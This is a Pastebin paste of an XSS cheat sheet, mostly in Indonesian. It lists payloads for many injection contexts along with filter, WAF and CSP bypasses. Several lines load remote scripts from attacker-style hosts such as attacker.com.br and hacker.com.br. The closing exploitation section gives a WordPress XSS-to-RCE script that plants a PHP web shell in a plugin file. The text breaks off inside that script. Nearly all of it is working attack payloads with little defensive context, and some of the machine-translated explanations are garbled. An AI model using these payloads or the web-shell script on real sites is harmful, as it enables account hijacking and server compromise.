kedjaw3n

xss

Aug 27th, 2023
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 38.54 KB | None | 0 0
  1. ---
  2. layout: post
  3. title: xss cheat sheet
  4. ---
  5. \# xss-cheat-sheet
  6.  
  7. \# Basics Xss
  8.  
  9. > HTML Context - Simple Tag Injection
  10.  
  11. Gunakan saat input masuk ke dalam nilai atribut dari tag HTML atau tag luar kecuali
  12.  
  13. yang dijelaskan dalam kasus berikutnya. Tambahkan "->" ke payload jika input masuk dalam komentar HTML.
  14.  
  15. <svg onload=alert(1)>
  16.  
  17. "><svg onload=alert(1)>
  18.  
  19. > HTML Context - In Block Tag Injection
  20.  
  21. Gunakan saat input masuk ke dalam atau di antara pembukaan / penutupan tag dalam tanda kurung berikut:
  22.  
  23. (<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian).
  24.  
  25. ==========================================================================================
  26.  
  27. </tag><svg onload=alert(1)>
  28.  
  29. "></tag><svg onload=alert(1)>
  30.  
  31. > HTML Context - Inline Injection
  32.  
  33. Gunakan saat input masuk ke dalam nilai atribut dari tag HTML tetapi tag itu tidak bisa
  34.  
  35. diakhiri dengan lebih dari tanda (>).
  36.  
  37. "onmouseover=alert(1) //
  38.  
  39. "autofocus onfocus=alert(1) //
  40.  
  41. > HTML Context - Source Injection
  42.  
  43. Gunakan ketika input mendarat sebagai nilai dari atribut tag HTML berikut: href, src, data atau
  44.  
  45. aksi (juga formulasi). Atribut Src dalam tag skrip dapat berupa URL atau "data:, alert (1)".
  46.  
  47. javascript:alert(1)
  48.  
  49. > Javascript Context - Code Injection
  50.  
  51. Gunakan ketika input mendarat di blok skrip, di dalam nilai string yang dibatasi.
  52.  
  53. '-alert(1)-'
  54.  
  55. '-alert(1)//
  56.  
  57. > Javascript Context - Code Injection with Escape Bypass
  58.  
  59. Gunakan ketika input mendarat di blok skrip, di dalam string yang dibatasi nilai tetapi tanda kutip
  60.  
  61. lolos dengan backslash.
  62.  
  63. \\'-alert(1)//
  64.  
  65. > Javascript Context - Tag Injection
  66.  
  67. Gunakan saat input mendarat di mana saja dalam blok skrip.
  68.  
  69. </script><svg onload=alert(1)>
  70.  
  71. # Advanced Xss
  72.  
  73. > Javascript Context - Code Injection in Logical Block
  74.  
  75. Gunakan muatan pertama atau kedua ketika input masuk dalam blok skrip, di dalam nilai yang dibatasi string dan
  76.  
  77. di dalam satu blok logis seperti fungsi atau kondisional (if, else, etc). Jika kutipan lolos
  78.  
  79. backslash, gunakan payload ketiga.
  80.  
  81. '}alert(1);{'
  82.  
  83. '}alert(1)%0A{'
  84.  
  85. \\'}alert(1);{//
  86.  
  87. > Javascript Context - Quoteless Code Injection
  88.  
  89. Gunakan saat ada multi refleksi di baris kode JS yang sama. Muatan 1 bekerja di JS sederhana
  90.  
  91. variabel dan 2 bekerja di objek JS non-objects
  92.  
  93. -alert(1)//\\
  94.  
  95. -alert(1)}//\\
  96.  
  97. > Javascript Context - Placeholder Injection in Template Literal
  98.  
  99. Gunakan saat input masuk ke dalam string backticks (\`\`) yang dibatasi atau di mesin template.
  100.  
  101. ${alert(1)}
  102.  
  103. > Multi Reflection in HTML Context - Double Reflection (Single Input)
  104.  
  105. Gunakan untuk memanfaatkan banyak refleksi pada halaman yang sama.
  106.  
  107. onload=alert(1)><svg/1='
  108.  
  109. '>alert(1)</script><script/1='
  110.  
  111. */alert(1)</script><script>/*
  112.  
  113. > Multi Reflection in HTML Context - Triple Reflection (Single Input)
  114.  
  115. Gunakan untuk memanfaatkan banyak refleksi pada halaman yang sama.
  116.  
  117. */alert(1)">'onload="/*<svg/1='
  118.  
  119. \`-alert(1)">'onload="\`<svg/1='
  120.  
  121. */</script>'>alert(1)/*<script/1='
  122.  
  123. > Multi Input Reflections (Double & Triple) in HTML Context
  124.  
  125. Gunakan untuk mengambil keuntungan dari beberapa input refleksi pada halaman yang sama. Juga berguna dalam HPP (HTTP
  126.  
  127. Parameter Pollution) skenario, di mana ada refleksi untuk parameter berulang. Ketiga
  128.  
  129. payload menggunakan refleksi yang dipisahkan koma dari parameter yang sama.
  130.  
  131. p=<svg/1='&q='onload=alert(1)>
  132.  
  133. p=<svg 1='&q='onload='/*&r=*/alert(1)'>
  134.  
  135. q=<script/&q=/src=data:&q=alert(1)>
  136.  
  137. > File Upload Injection – Filename
  138.  
  139. Gunakan saat nama file yang diunggah reflected di suatu tempat di halaman target.
  140.  
  141. "><svg onload=alert(1)>.gif
  142.  
  143. > File Upload Injection – Metadata
  144.  
  145. Gunakan ketika metadata file yang diunggah reflected di suatu tempat di halaman target. Itu menggunakan
  146.  
  147. command-line exiftool ("$" adalah terminal prompt) dan setiap bidang metadata dapat disetel.
  148.  
  149. $ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
  150.  
  151. > File Upload Injection – SVG File
  152.  
  153. Gunakan untuk membuat XSS tersimpan sesuai target saat mengunggah file gambar. Simpan konten di bawah ini sebagai
  154.  
  155. "Xss.svg".
  156.  
  157. <svg xmlns="[http://www.w3.org/2000/svg](http://www.w3.org/2000/svg "http://www.w3.org/2000/svg")" onload="alert(1)"/>
  158.  
  159. > DOM Insert Injection
  160.  
  161. Gunakan untuk menguji XSS ketika injeksi dimasukkan ke DOM sebagai markup yang valid alih-alih menjadi
  162.  
  163. reflected dalam kode sumber. Ini berfungsi untuk kasus di mana tag skrip dan vektor lainnya tidak akan berfungsi.
  164.  
  165. <img src=1 onerror=alert(1)>
  166.  
  167. <iframe src=javascript:alert(1)>
  168.  
  169. <details open ontoggle=alert(1)>
  170.  
  171. <svg><svg onload=alert(1)>
  172.  
  173. > DOM Insert Injection – Resource Request
  174.  
  175. Gunakan ketika kode javascript halaman memasukkan ke dalam halaman hasil permintaan ke URL
  176.  
  177. dikontrol oleh penyerang (injeksi).
  178.  
  179. data:text/html,<img src=1 onerror=alert(1)>
  180.  
  181. data:text/html,<iframe src=javascript:alert(1)>
  182.  
  183. > PHP_SELF Injection
  184.  
  185. Gunakan ketika URL saat ini digunakan oleh kode PHP yang mendasari target sebagai nilai atribut dari
  186.  
  187. Bentuk HTML, misalnya. Suntikkan antara ekstensi php dan mulai bagian permintaan (?) Menggunakan a
  188.  
  189. leading slash (/).
  190.  
  191. [https://vulnerabilty-xss.com.br/xss.php/](https://vulnerabilty-xss.com.br/xss.php/ "https://vulnerabilty-xss.com.br/xss.php/")"><svg onload=alert(1)>?a=reader
  192.  
  193. > Script Injection - No Closing Tag
  194.  
  195. Gunakan ketika ada tag skrip penutup (</script>) di suatu tempat dalam kode setelah reflection.
  196.  
  197. <script src=data:,alert(1)>
  198.  
  199. <script src=//attacker.com.br/1.js>
  200.  
  201. > Javascript postMessage() DOM Injection (with Iframe)
  202.  
  203. Gunakan ketika ada pendengar acara "pesan" seperti di "window.addEventListener (‘ message ’, ...)"
  204.  
  205. dalam kode javascript tanpa pemeriksaan asal. Target harus dapat dibingkai (X-Frame
  206.  
  207. Pilihan tajuk sesuai konteks). Simpan sebagai file HTML (atau menggunakan data: teks / html) yang disediakan
  208.  
  209. TARGET_URL dan INJECTION (vektor XSS atau payload).
  210.  
  211. <iframe src=TARGET_URL onload="frames\[0\].postMessage('INJECTION','*')">
  212.  
  213. > XML-Based XSS
  214.  
  215. Gunakan untuk menyuntikkan vektor XSS dalam halaman XML (tipe konten teks / xml atau aplikasi / xml).
  216.  
  217. Tambahkan "->" ke payload jika input masuk di bagian komentar atau "\]\]>" jika input masuk a
  218.  
  219. Bagian "CDATA".
  220.  
  221. <x:script xmlns:x="[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml "http://www.w3.org/1999/xhtml")">alert(1)</x:script>
  222.  
  223. <x:script xmlns:x="[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml "http://www.w3.org/1999/xhtml")" src="//hacker.com.br/1.js"/>
  224.  
  225. > AngularJS Injections (v1.6 and up)
  226.  
  227. Gunakan ketika ada perpustakaan AngularJS dimuat di halaman, di dalam blok HTML dengan ng-app
  228.  
  229. direktif (payload pertama) atau buat milik Anda sendiri (yang kedua).
  230.  
  231. {{$new.constructor('alert(1)')()}}
  232.  
  233. <x ng-app>{{$new.constructor('alert(1)')()}}
  234.  
  235. > CRLF Injection
  236.  
  237. Gunakan saat aplikasi merefleksikan input di salah satu header respons, memungkinkan injeksi
  238.  
  239. Karakter Pengembalian Carriage (% 0D) dan Line Feed (% 0A). Vektor untuk Gecko dan Webkit,
  240.  
  241. masing-masing.
  242.  
  243. %0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E
  244.  
  245. %0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E
  246.  
  247. > Onscroll Universal XSS Vector
  248.  
  249. Gunakan untuk XSS tanpa interaksi pengguna saat menggunakan pengendali event onscroll. Ini bekerja dengan
  250.  
  251. alamat, blockquote, body, center, dir, div, dl, dt, form, li, menu, ol, p, pre, ul, dan h1 ke h6
  252.  
  253. Tag HTML.
  254.  
  255. <p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
  256.  
  257. > XSS in SSI
  258.  
  259. Gunakan saat ada injeksi Server-Side Include (SSI).
  260.  
  261. <<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>
  262.  
  263. > Type Juggling
  264.  
  265. Gunakan untuk melewati kondisi "if" yang cocok dengan angka dalam perbandingan longgar.
  266.  
  267. 1<svg onload=alert(1)>
  268.  
  269. 1"><svg onload=alert(1)>
  270.  
  271. > SQLi Error-Based XSS
  272.  
  273. Gunakan di titik akhir di mana pesan kesalahan SQL dapat dipicu (dengan kutipan atau backslash).
  274.  
  275. '1<svg onload=alert(1)>
  276.  
  277. <svg onload=alert(1)>\\
  278.  
  279. > Bootstrap XSS Vector
  280.  
  281. Gunakan ketika ada perpustakaan bootstrap hadir di halaman. Itu juga memotong Auditor Webkit, adil
  282.  
  283. klik di mana saja di halaman untuk memicu. Karakter apa pun dari nilai href dapat dikodekan dalam HTML, bypass
  284.  
  285. filter.
  286.  
  287. <html data-toggle=tab href="<img src=x onerror=alert(1)>">
  288.  
  289. > Browser Notification
  290.  
  291. Gunakan sebagai alternatif untuk mengingatkan, meminta, dan mengonfirmasi popup. Itu membutuhkan penerimaan pengguna (1 st
  292.  
  293. payload) tetapi begitu pengguna telah mengotorisasi sebelumnya untuk situs itu, yang ke-2 dapat digunakan.
  294.  
  295. Notification.requestPermission(x=>{new(Notification)(1)})
  296.  
  297. new(Notification)(1)
  298.  
  299. \# filter bypass
  300.  
  301. > Mixed Case XSS
  302.  
  303. Gunakan untuk mem-bypass filter case-sensitive.
  304.  
  305. <Svg OnLoad=alert(1)>
  306.  
  307. <Script>alert(1)</Script>
  308.  
  309. > Unclosed Tags
  310.  
  311. Gunakan dalam suntikan HTML untuk menghindari pemfilteran di bawah kedua (<) dan
  312.  
  313. lebih besar dari (>) tanda. Dibutuhkan asli yang lebih besar dari kode sumber masuk setelah input
  314.  
  315. refleksi.
  316.  
  317. <svg onload=alert(1)//
  318.  
  319. <svg onload="alert(1)"
  320.  
  321. > Uppercase XSS
  322.  
  323. Gunakan saat aplikasi mencerminkan input dalam huruf besar. Ganti "&" dengan "% 26" dan "#" dengan
  324.  
  325. "% 23" di URL.
  326.  
  327. <SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
  328.  
  329. <SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
  330.  
  331. > Extra Content for Script Tags
  332.  
  333. Gunakan saat filter mencari "<script>" atau "<script src = ..." dengan beberapa variasi tetapi tanpa
  334.  
  335. memeriksa atribut lain yang tidak diperlukan
  336.  
  337. <script/x>alert(1)</script>
  338.  
  339. > Double Encoded XSS
  340.  
  341. Gunakan ketika aplikasi melakukan decoding input ganda.
  342.  
  343. %253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
  344.  
  345. %2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
  346.  
  347. > Alert without Parentheses (Strings Only)
  348.  
  349. Gunakan dalam vektor HTML atau injeksi javascript ketika tanda kurung tidak diizinkan dan a
  350.  
  351. kotak peringatan sederhana sudah cukup.
  352.  
  353. alert\`1\`
  354.  
  355. > Alert without Parentheses
  356.  
  357. Gunakan dalam vektor HTML atau injeksi javascript ketika tanda kurung tidak diizinkan dan PoC
  358.  
  359. perlu mengembalikan informasi target.
  360.  
  361. setTimeout\`alert\\x28document.domain\\x29\`
  362.  
  363. setInterval\`alert\\x28document.domain\\x29\`
  364.  
  365. > Alert without Parentheses (Tag Exclusive)
  366.  
  367. Gunakan hanya dalam suntikan HTML ketika tanda kurung tidak diizinkan. Ganti “&” dengan “% 26”
  368.  
  369. dan "#" dengan "% 23" di URL.
  370.  
  371. <svg onload=alert&lpar;1&rpar;>
  372.  
  373. <svg onload=alert&#40;1&#41>
  374.  
  375. > Alert without Alphabetic Chars
  376.  
  377. Gunakan saat karakter alfabet tidak diizinkan. Berikut ini adalah peringatan (1).
  378.  
  379. \[\]\['\\146\\151\\154\\164\\145\\162'\]\['\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162'\]('\\141\\154\\145\\162\\164\\50\\61\\51')()
  380.  
  381. > Alert Obfuscation
  382.  
  383. Gunakan untuk mengelabui beberapa filter ekspresi reguler (regex). Mungkin dikombinasikan dengan sebelumnya
  384.  
  385. alternatif (above). Opsi terpendek "atas" juga dapat diganti dengan “window”, “parent”,
  386.  
  387. “self” or “this” tergantung pada konteksnya.
  388.  
  389. (alert)(1)
  390.  
  391. a=alert,a(1)
  392.  
  393. \[1\].find(alert)
  394.  
  395. top\["al"+"ert"\](1)
  396.  
  397. top\[/al/.source+/ert/.source\](1)
  398.  
  399. al\\u0065rt(1)
  400.  
  401. top\['al\\145rt'\](1)
  402.  
  403. top\[8680439..toString(30)\](1)
  404.  
  405. top.open\`javas\\cript:al\\ert(1)\`
  406.  
  407. > Alert Alternative
  408.  
  409. Gunakan sebagai alternatif untuk mengingatkan, meminta dan mengonfirmasi. Jika digunakan dengan vektor HTML, bisa jadi
  410.  
  411. digunakan sebagaimana adanya tetapi jika merupakan suntikan JS, formulir "document.write" lengkap diperlukan. Ganti "&"
  412.  
  413. dengan "% 26" dan "#" dengan "% 23" di URL.
  414.  
  415. write\`XSSed!\`
  416.  
  417. write\`<img/src/o&#78error=alert&lpar;1)&gt;\`
  418.  
  419. > Strip-Tags Based Bypass
  420.  
  421. Gunakan saat menyaring menghapus apa pun di antara karakter <dan> seperti strip_tags PHP ()
  422.  
  423. fungsi. Hanya injeksi inline.
  424.  
  425. "o<x>nmouseover=alert<x>(1)//
  426.  
  427. "autof<x>ocus o<x>nfocus=alert<x>(1)//
  428.  
  429. > File Upload Injection – HTML/js GIF Disguise
  430.  
  431. Gunakan untuk mem-bypass CSP melalui pengunggahan file. Simpan semua konten di bawah ini sebagai "xss.gif" atau "xss.js" (untuk ketat
  432.  
  433. Memeriksa MIME). Itu dapat diimpor ke halaman target dengan <link rel = import href = xss.gif> (juga
  434.  
  435. “Xss.js”) atau <script src = xss.js> </script>. Ini gambar / gif untuk PHP.
  436.  
  437. GIF89a=//<script>
  438.  
  439. alert(1)//</script>;
  440.  
  441. > Jump to URL Fragment
  442.  
  443. Gunakan saat Anda perlu menyembunyikan beberapa karakter dari payload Anda yang akan memicu WAF
  444.  
  445. sebagai contoh. Itu menggunakan format payload masing-masing setelah fragmen URL (#).
  446.  
  447. eval(URL.slice(-8)) #alert(1)
  448.  
  449. eval(location.hash.slice(1)) #alert(1)
  450.  
  451. document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>
  452.  
  453. > HTML Alternative Separators
  454.  
  455. Gunakan saat ruang default tidak diizinkan. Garis miring dan kutipan (tunggal atau ganda) mungkin URL
  456.  
  457. disandikan (% 2F,% 27 dan% 22 masing-masing) juga, sementara tanda tambah (+) hanya dapat digunakan dalam URL.
  458.  
  459. Tag Scheme:
  460.  
  461. <name \[1\] attrib \[2\] = \[3\] value \[4\] handler \[5\] = \[6\] js \[7\]>
  462.  
  463. \[1\], \[2\], \[5\] => %09, %0A, %0C, %0D, %20, / and +
  464.  
  465. \[3\] & \[4\] => %09, %0A, %0C, %0D, %20, + and ' or " in both
  466.  
  467. \[6\] & \[7\] => %09, %0A, %0B, %0C, %0D, %20, /, + and ' or " in both
  468.  
  469. > 2 nd Order XSS Injection
  470.  
  471. Gunakan saat input Anda akan digunakan dua kali, seperti disimpan dinormalisasi dalam database dan kemudian
  472.  
  473. diambil untuk digunakan nanti atau dimasukkan ke DOM
  474.  
  475. &lt;svg/onload&equals;alert(1)&gt;
  476.  
  477. > Event Origin Bypass for postMessage() XSS
  478.  
  479. Use when a check for origin can be bypassed in javascript code of target by prepending one
  480.  
  481. of the allowed origins as a subdomain of the attacking domain that will send the payload.
  482.  
  483. Example makes use of Crosspwn script (available in Miscellaneous section) at localhost
  484.  
  485. [http://facebook.com.localhost/crosspwn.php?target=//brutelogic.com.br/tests/status.html&msg=](http://facebook.com.localhost/crosspwn.php?target=//brutelogic.com.br/tests/status.html&msg= "http://facebook.com.localhost/crosspwn.php?target=//brutelogic.com.br/tests/status.html&msg=")<script>alert(1)</script>
  486.  
  487. > CSP Bypass (for Whitelisted Google Domains)
  488.  
  489. Gunakan ketika ada CSP (Kebijakan Keamanan Konten) yang memungkinkan eksekusi dari ini
  490.  
  491. domain.
  492.  
  493. <script src=[https://www.google.com/complete/search?client=chrome%26jsonp=alert](https://www.google.com/complete/search?client=chrome%26jsonp=alert "https://www.google.com/complete/search?client=chrome%26jsonp=alert")(1);></script>
  494.  
  495. <script src=[https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js](https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js "https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js")></script><x ng-app ng-csp>{{$new.constructor('alert(1)')()}}
  496.  
  497. > Vectors without Event Handlers
  498.  
  499. Gunakan sebagai alternatif untuk penangan acara, jika mereka tidak diizinkan. Beberapa membutuhkan pengguna
  500.  
  501. interaksi sebagaimana dinyatakan dalam vektor itu sendiri (juga bagian dari mereka).
  502.  
  503. <script>alert(1)</script>
  504.  
  505. <script src=data:,alert(1)>
  506.  
  507. <iframe src=javascript:alert(1)>
  508.  
  509. <embed src=javascript:alert(1)>
  510.  
  511. <a href=javascript:alert(1)>click
  512.  
  513. <math><brute href=javascript:alert(1)>click
  514.  
  515. <form action=javascript:alert(1)><input type=submit>
  516.  
  517. <isindex action=javascript:alert(1) type=submit value=click>
  518.  
  519. <form><button formaction=javascript:alert(1)>click
  520.  
  521. <form><input formaction=javascript:alert(1) type=submit value=click>
  522.  
  523. <form><input formaction=javascript:alert(1) type=image value=click>
  524.  
  525. <form><input formaction=javascript:alert(1) type=image src=SOURCE>
  526.  
  527. <isindex formaction=javascript:alert(1) type=submit value=click>
  528.  
  529. <object data=javascript:alert(1)>
  530.  
  531. <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
  532.  
  533. <svg><script xlink:href=data:,alert(1) />
  534.  
  535. <math><brute xlink:href=javascript:alert(1)>click
  536.  
  537. > Vectors with Agnostic Event Handlers
  538.  
  539. Gunakan vektor berikut ini ketika semua nama tag HTML yang dikenal tidak diizinkan. Huruf apa saja
  540.  
  541. char atau string dapat digunakan sebagai nama tag di tempat "x". Mereka membutuhkan interaksi pengguna seperti yang dinyatakan
  542.  
  543. oleh konten teks mereka sendiri (yang menjadi bagian dari vektor juga).
  544.  
  545. <x contenteditable onblur=alert(1)>lose focus!
  546.  
  547. <x onclick=alert(1)>click this!
  548.  
  549. <x oncopy=alert(1)>copy this!
  550.  
  551. <x oncontextmenu=alert(1)>right click this!
  552.  
  553. <x onauxclick=alert(1)>right click this!
  554.  
  555. <x oncut=alert(1)>copy this!
  556.  
  557. <x ondblclick=alert(1)>double click this!
  558.  
  559. <x ondrag=alert(1)>drag this!
  560.  
  561. <x contenteditable onfocus=alert(1)>focus this!
  562.  
  563. <x contenteditable oninput=alert(1)>input here!
  564.  
  565. <x contenteditable onkeydown=alert(1)>press any key!
  566.  
  567. <x contenteditable onkeypress=alert(1)>press any key!
  568.  
  569. <x contenteditable onkeyup=alert(1)>press any key!
  570.  
  571. <x onmousedown=alert(1)>click this!
  572.  
  573. <x onmousemove=alert(1)>hover this!
  574.  
  575. <x onmouseout=alert(1)>hover this!
  576.  
  577. <x onmouseover=alert(1)>hover this!
  578.  
  579. <x onmouseup=alert(1)>click this!
  580.  
  581. <x contenteditable onpaste=alert(1)>paste here!
  582.  
  583. > Javascript Alternative Comments
  584.  
  585. Gunakan ketika komentar javascript biasa (garis miring ganda) tidak diizinkan, diloloskan atau
  586.  
  587. dihapus.
  588.  
  589. <!--%0A-->
  590.  
  591. > SVG Script Vector - Arbitrary Closing TagGunakan saat filter mengharapkan "</script>" dan tidak ada penutupan asli setelah injeksi masuk
  592.  
  593. kode sumber dan / atau tanda sama dengan tidak diizinkan. Hanya tokek.
  594.  
  595. <svg><x><script>alert(1)</x>
  596.  
  597. > Mixed Context Reflection Entity Bypass
  598.  
  599. Gunakan untuk mengubah refleksi yang difilter dalam blok skrip dalam kode js yang sebenarnya valid. Itu perlu direfleksikan
  600.  
  601. baik dalam konteks HTML dan javascript, dalam urutan itu, dan dekat satu sama lain. Tag svg
  602.  
  603. akan membuat blok skrip berikutnya diurai dengan cara yang bahkan jika tanda kutip tunggal menjadi
  604.  
  605. disandikan sebagai & # 39; dalam refleksi (disanitasi), itu akan berlaku untuk keluar dari nilai saat ini
  606.  
  607. dan memicu peringatan.
  608.  
  609. '-alert(1)-'<svg>
  610.  
  611. \\'-alert(1)//<svg>
  612.  
  613. > Strip-My-Script Vector
  614.  
  615. Gunakan untuk mengelabui filter yang menghapus vektor XSS klasik dan paling dikenal. Ini berfungsi apa adanya dan jika
  616.  
  617. "<script>" dihapus.
  618.  
  619. <svg/on<script><script>load=alert(1)//</script>
  620.  
  621. > JS Lowercased Input
  622.  
  623. Gunakan ketika aplikasi target mengubah input Anda menjadi huruf kecil melalui javascript. Mungkin berhasil
  624.  
  625. juga untuk operasi huruf kecil sisi server.
  626.  
  627. <SCRİPT>alert(1)</SCRİPT>
  628.  
  629. <SCRİPT/SRC=data:,alert(1)>
  630.  
  631. > Overlong UTF-8
  632.  
  633. Gunakan saat aplikasi target melakukan pemetaan yang paling sesuai.
  634.  
  635. %CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
  636.  
  637. > Uncommon Event Handlers
  638.  
  639. Gunakan untuk memintas filter berbasis daftar hitam untuk penangan acara. Ini berfungsi pada Tokek tetapi menambahkan
  640.  
  641. attributename = x di dalam tag "<set>" membuatnya berfungsi di Webkit juga
  642.  
  643. <svg><set onbegin=alert(1)>
  644.  
  645. <svg><set end=1 onend=alert(1)>
  646.  
  647. > HTML Entities - Null Byte Tolerance
  648.  
  649. Gunakan untuk menghindari penyaringan entitas HTML. Semua di atas hanya mewakili karakter "(". Tokek.
  650.  
  651. %26%00%2340;
  652.  
  653. %26%00lpar;
  654.  
  655. %26%00l%26%00p%26%00a%26%00r%26%00;
  656.  
  657. > Vectors Exclusive for ASP Pages
  658.  
  659. Gunakan untuk memintas filter \[\[alpha\] di halaman .asp.
  660.  
  661. %u003Csvg onload=alert(1)>
  662.  
  663. %u3008svg onload=alert(2)>
  664.  
  665. %uFF1Csvg onload=alert(3)>
  666.  
  667. > PHP Email Validation Bypass
  668.  
  669. Gunakan untuk memintas flag FILTER_VALIDATE_EMAIL flag dari fungsi filter_var () PHP.
  670.  
  671. "><svg/onload=alert(1)>"@x.y
  672.  
  673. > DOM Insertion via Server Side Reflection
  674.  
  675. Gunakan ketika input direfleksikan ke sumber dan tidak bisa dijalankan dengan mencerminkan tetapi dengan menjadi
  676.  
  677. dimasukkan ke dalam DOM. Menghindari pemfilteran browser dan WAFs.
  678.  
  679. \\74svg o\\156load\\75alert\\501\\51\\76
  680.  
  681. > XML-Based Vector for Bypass
  682.  
  683. Gunakan untuk memintas penyaringan browser dan WAFs di halaman XML. Tambahkan "->" ke payload jika input
  684.  
  685. mendarat di bagian komentar atau "\]\]>" jika input mendarat di bagian "CDATA".
  686.  
  687. <_:script xmlns:_="[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml "http://www.w3.org/1999/xhtml")">alert(1)</_:script>
  688.  
  689. > Javascript Context - Tag Injection (Webkit Bypass)
  690.  
  691. Gunakan untuk memotong Auditor Webkit dalam konteks javascript dengan keluar dari blok skrip.
  692.  
  693. </script><svg><script>alert(1)//
  694.  
  695. </script><script>'%0B'-alert(1)//
  696.  
  697. > Double Reflection With Single Input (Webkit Bypass)
  698.  
  699. Gunakan untuk memintas Auditor Webkit dalam skenario refleksi ganda untuk konteks apa pun.
  700.  
  701. "\`-alert(1)</script><script>\`
  702.  
  703. > Vector for PHP Arrays Dump (Webkit Bypass)
  704.  
  705. Gunakan ketika refleksi berasal dari penggunaan fungsi PHP var_dump () dan print_r (). "P" adalah
  706.  
  707. parameter rentan.
  708.  
  709. ?p\[<script>\`\]=\`/alert(1)</script>
  710.  
  711. > Javascript Context - Code Injection (IE11/Edge Bypass)
  712.  
  713. Gunakan untuk mem-bypass Microsoft IE11 atau Edge saat menyuntikkan ke dalam konteks javascript.
  714.  
  715. ';onerror=alert;throw 1//
  716.  
  717. > HTML Context - Tag Injection (IE11/Edge XSS Bypass)
  718.  
  719. Gunakan untuk mem-bypass filter asli mereka dalam skenario multi-refleksi.
  720.  
  721. "'>confirm&lpar;1)</Script><Svg><Script/1='
  722.  
  723. > DOM-Based XSS - Location Sink Filter Evasion
  724.  
  725. Gunakan saat filter mencari "https: // DOMAIN" dalam string yang digunakan untuk pengalihan
  726.  
  727. properti document.location. Itu juga menyalahgunakan cara string "Javascript" dapat dibangun.
  728.  
  729. %01Jav%09asc%09ript:https://DOMAIN/%250Acon%09firm%25%281%25%29
  730.  
  731. > Vectors with Less Known Agnostic Event Handlers
  732.  
  733. Penangan acara yang dapat digunakan dengan nama tag yang berubah-ubah. Namun perlu diingat bahwa menggunakan
  734.  
  735. nama tag yang ada seperti "<b" untuk onafterscriptexecute dan onbeforescriptexecute mungkin
  736.  
  737. satu-satunya cara untuk memicu dalam beberapa skenario.
  738.  
  739. <x onmouseenter=alert(1)>
  740.  
  741. <x onafterscriptexecute=alert(1)>
  742.  
  743. <x onbeforescriptexecute=alert(1)>
  744.  
  745. <x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
  746.  
  747. <x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
  748.  
  749. > Nested SVG Vector (Base64)
  750.  
  751. Gunakan untuk memintas filter. Hanya tokek, URL disandikan.
  752.  
  753. <svg><use xlink:href=data:image/svg%2Bxml;base64,
  754.  
  755. PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnL
  756.  
  757. zIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My
  758.  
  759. 5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwO
  760.  
  761. i8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3
  762.  
  763. JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
  764.  
  765. \# exploitation
  766.  
  767. > Remote Script Call
  768.  
  769. Gunakan ketika Anda perlu memanggil skrip eksternal tetapi vektor XSS adalah berbasis handler (seperti
  770.  
  771. <svg onload =) atau dalam suntikan javascript. Domain "brutelogic.com.br" bersama dengan HTML
  772.  
  773. dan file js digunakan sebagai contoh. Jika ">" sedang difilter, ganti "r =>" atau "w =>" untuk
  774.  
  775. "fungsi()".
  776.  
  777. => Berbasis HTML
  778.  
  779. (respons harus berupa HTML dengan tajuk Akses-Kontrol-Bolehkan-Asal (CORS))
  780.  
  781. 1. "var x=new XMLHttpRequest();x.open('GET','//brutelogic.com.br/0.php');x.send();
  782.  
  783. x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}"
  784.  
  785. 2. fetch('//brutelogic.com.br/0.php').then(r=>{r.text().then(w=>{write(w)})})
  786.  
  787. * (with fully loaded JQuery library)
  788.  
  789. 3. $.get('//brutelogic.com.br/0.php',r=>{write(r)})
  790.  
  791. => Javascript-based (response must be javascript)
  792.  
  793. 4. with(document)body.appendChild(createElement('script')).src='//brutelogic.com.br/2.js'
  794.  
  795. * (with fully loaded JQuery library)
  796.  
  797. 5. $.getScript('//brutelogic.com.br/2.js')
  798.  
  799. > Wordpress XSS to RCE (v5.0.3)
  800.  
  801. Gunakan itu sebagai skrip jarak jauh untuk dijalankan ketika admin Wordpress mendapat XSSed untuk membuat shell web.
  802.  
  803. Plugin "Hello Dolly" adalah target di sini (terlepas dari aktivasi) tetapi hampir semua plugin lainnya
  804.  
  805. dapat digunakan, mengubah file dan jalur yang sesuai (termasuk "wordpress" sebagai WP root).
  806.  
  807. p = '/wp-admin/plugin-editor.php?';
  808.  
  809. q = 'file=hello.php&plugin=hello.php';
  810.  
  811. s = '<?=\`$_POST\[1\]\`;';
  812.  
  813. a = new XMLHttpRequest();
  814.  
  815. a.open('GET', p+q, 0);
  816.  
  817. a.send();
  818.  
  819. $ = 'nonce=' + /nonce" value="(\[^"\]*?)"/.exec(a.responseText)\[1\] +
  820.  
  821. '&newcontent=' + s + '&action=edit-theme-plugin-file&' + q;
  822.  
  823. b = new XMLHttpRequest();
  824.  
